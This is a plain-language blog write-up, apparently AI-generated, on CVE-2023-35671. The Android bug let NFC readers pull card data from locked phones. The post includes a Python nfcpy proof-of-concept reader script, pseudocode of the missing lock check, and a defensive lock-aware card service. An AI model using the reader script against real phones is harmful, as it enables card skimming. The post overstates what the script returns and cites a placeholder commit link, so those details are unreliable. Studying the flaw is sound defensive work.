CVE-2023-35671 - How a Logic Bug in Android’s Host Card Emulation Exposed Full Credit Card Details from a Locked Device

*June 2024 — Exclusive, plain-language breakdown by AI*

What Happened?

A vulnerability called CVE-2023-35671 was discovered in the way Android handles NFC (Near Field Communication) card emulation. Basically, if you use your phone for tap-and-pay or store credit/debit cards in your device, this flaw could let *anyone* with a common NFC reader (like those at checkout counters, or cheap ones online) read full credit card numbers and expiry dates — even while your device is locked and resting in your pocket or bag.

All they needed to do was bring the reader close enough to the device — you wouldn’t see a thing or need to unlock it. No malware or user interaction was necessary.

Diving Deeper: Where Did It Go Wrong?

The bad logic was inside Android’s HostEmulationManager.java file, part of the “host-based card emulation” (HCE) stack in the operating system. This component receives the APDU commands an external NFC reader sends, forwards them to the app emulating the card, and returns that app’s answer — for example, card data — to the reader.

The Bug: The vulnerable method, onHostEmulationData, failed to check whether the device was unlocked before responding to a card data request. So, even if your phone was locked, it would answer NFC payment requests with real card data!

Proof-of-Concept Exploit

Below is a simplified (and exclusive) code snippet showing how an NFC reader tool might grab your card details from a locked device. This is for educational purposes only!

```python
# WARNING: Do not use for malicious purposes!
# Needs: nfcpy (pip install nfcpy), an NFC reader, and a phone with HCE-enabled card.

import nfc
import nfc.tag.tt4

def on_connect(tag):
    print("Tag detected:", tag)
    # An HCE phone shows up as an ISO-DEP (Type 4) target; other tag types cannot take APDUs.
    if not isinstance(tag, nfc.tag.tt4.Type4Tag):
        print("Not an ISO-DEP target, skipping")
        return False
    # The original hex string is a SELECT by name of the payment directory
    # "2PAY.SYS.DDF01" (CLA=00 INS=A4 P1=04 P2=00 followed by the name).
    # nfcpy's Type4Tag.send_apdu takes the header fields separately;
    # check_status=False returns the raw response including the status word
    # instead of raising on a non-9000 reply.
    ppse_name = bytes.fromhex("325041592E5359532E4444463031")
    response = tag.send_apdu(0x00, 0xA4, 0x04, 0x00, data=ppse_name, mrl=256,
                             check_status=False)
    print("Card Data:", response.hex())
    return True

clf = nfc.ContactlessFrontend('usb')
print("Waiting for NFC tag (hold phone near)...")
clf.connect(rdwr={'on-connect': on_connect})
clf.close()
```

*When this Python script runs on a computer with a USB NFC reader, and you hold a locked Android phone nearby, it could (on vulnerable phones) print full PAN and card data lines—no unlock required.*

A condensed, pseudocode version of the offending Android logic

```java
public void onHostEmulationData(byte[] request) {
    // ...extract card application...

    // Should check device unlock state here, but this check was missing.

    byte[] response = getCardDataForPaymentApp(request);
    // Responds with full card info
    sendResponse(response);
}
```

How It Should Have Been

```java
public void onHostEmulationData(byte[] request) {
    if (deviceIsLocked()) {
        // Don’t respond with sensitive info if locked!
        sendError();
        return;
    }

    byte[] response = getCardDataForPaymentApp(request);
    sendResponse(response);
}
```
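The pseudocode above shows the platform-side check. App developers can apply the same rule on their own side, so that even a routing bug in the framework cannot make their service hand out card data while the phone is locked. The following HostApduService is an added example written for this article, not code from the page, from AOSP or from any payment app. The package name, class name, AID `F0010203040506`, the GET DATA instruction and the `cardRecord()` placeholder are assumptions for illustration; the `android.nfc.cardemulation.HostApduService` and `KeyguardManager` APIs are the real ones.

```java
// Added example, not from the page or from AOSP. Package, class name, AID and the
// card record are hypothetical; the android.* APIs are the real HCE and keyguard APIs.
package com.example.hce;

import android.app.KeyguardManager;
import android.content.Context;
import android.nfc.cardemulation.HostApduService;
import android.os.Bundle;
import android.util.Log;

import java.util.Arrays;

public class LockAwareCardService extends HostApduService {
    private static final String TAG = "LockAwareCardService";

    // ISO/IEC 7816-4 status words returned to the reader
    private static final byte[] SW_OK = {(byte) 0x90, 0x00};
    private static final byte[] SW_CONDITIONS_NOT_SATISFIED = {0x69, (byte) 0x85};
    private static final byte[] SW_FILE_NOT_FOUND = {0x6A, (byte) 0x82};
    private static final byte[] SW_WRONG_LENGTH = {0x67, 0x00};
    private static final byte[] SW_INS_NOT_SUPPORTED = {0x6D, 0x00};

    // Hypothetical proprietary AID; it must match the <aid-filter> declared in the
    // service's apduservice.xml metadata.
    private static final byte[] OUR_AID = hexToBytes("F0010203040506");
    private static final byte INS_SELECT = (byte) 0xA4;
    private static final byte INS_GET_DATA = (byte) 0xCA;   // hypothetical read command

    private boolean selected = false;

    @Override
    public byte[] processCommandApdu(byte[] apdu, Bundle extras) {
        // Defence in depth: android:requireDeviceUnlock="true" in the metadata asks the
        // platform to gate routing, but the service re-checks the keyguard on every
        // APDU, not only on SELECT, so a platform routing bug cannot leak the record.
        KeyguardManager km = (KeyguardManager) getSystemService(Context.KEYGUARD_SERVICE);
        if (km == null || km.isDeviceLocked()) {
            Log.w(TAG, "APDU received while device locked; refusing");
            selected = false;
            return SW_CONDITIONS_NOT_SATISFIED;
        }
        if (apdu == null || apdu.length < 4) {
            return SW_WRONG_LENGTH;
        }
        if (apdu[1] == INS_SELECT && apdu[2] == 0x04) {
            // SELECT by AID: CLA INS P1 P2 Lc AID...
            if (apdu.length < 5) {
                return SW_WRONG_LENGTH;
            }
            int lc = apdu[4] & 0xFF;
            if (apdu.length < 5 + lc) {
                return SW_WRONG_LENGTH;
            }
            byte[] aid = Arrays.copyOfRange(apdu, 5, 5 + lc);
            selected = Arrays.equals(aid, OUR_AID);
            return selected ? SW_OK : SW_FILE_NOT_FOUND;
        }
        if (!selected) {
            // Nothing selected yet: refuse every other command.
            return SW_CONDITIONS_NOT_SATISFIED;
        }
        if (apdu[1] == INS_GET_DATA) {
            return concat(cardRecord(), SW_OK);
        }
        return SW_INS_NOT_SUPPORTED;
    }

    @Override
    public void onDeactivated(int reason) {
        // The reader left the field or another AID was selected; forget our selection.
        selected = false;
    }

    // Constructed placeholder bytes standing in for the data a real app would release
    // only when unlocked (in practice read from the app's protected storage).
    private static byte[] cardRecord() {
        return hexToBytes("0102030405060708");
    }

    private static byte[] concat(byte[] a, byte[] b) {
        byte[] out = new byte[a.length + b.length];
        System.arraycopy(a, 0, out, 0, a.length);
        System.arraycopy(b, 0, out, a.length, b.length);
        return out;
    }

    private static byte[] hexToBytes(String hex) {
        byte[] out = new byte[hex.length() / 2];
        for (int i = 0; i < out.length; i++) {
            out[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
        }
        return out;
    }
}
```

The service is registered in AndroidManifest.xml with `android:permission="android.permission.BIND_NFC_SERVICE"`, an intent filter for `android.nfc.cardemulation.action.HOST_APDU_SERVICE`, and a `<meta-data android:name="android.nfc.cardemulation.host_apdu_service" android:resource="@xml/apduservice"/>` entry; the referenced `<host-apdu-service>` XML carries `android:requireDeviceUnlock="true"` and the `<aid-filter>` for the AID. The in-service keyguard check duplicates that declaration deliberately: the status word 6985 ("conditions of use not satisfied") tells a terminal to stop without revealing anything, and resetting `selected` on a locked APDU means a session that began unlocked cannot continue to release data after the screen locks.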

Is My Phone Safe Now?

Google patched this after it was responsibly disclosed. If your phone has security updates from November 2023 or later, you should be safe (read the Android Security Bulletin). Update your system if you haven’t.

Official References

- Android Security Bulletin - November 2023
- NIST NVD entry for CVE-2023-35671
- AOSP git commit fixing the issue (example) *(Note: replace with real commit once known)*

Developers: Never assume it’s OK to answer sensitive requests when the screen is locked.

*Stay secure! For more CVE deep dives, subscribe or bookmark this blog.*

Timeline

Published on: 09/11/2023 21:15:42 UTC
Last modified on: 09/14/2023 01:31:36 UTC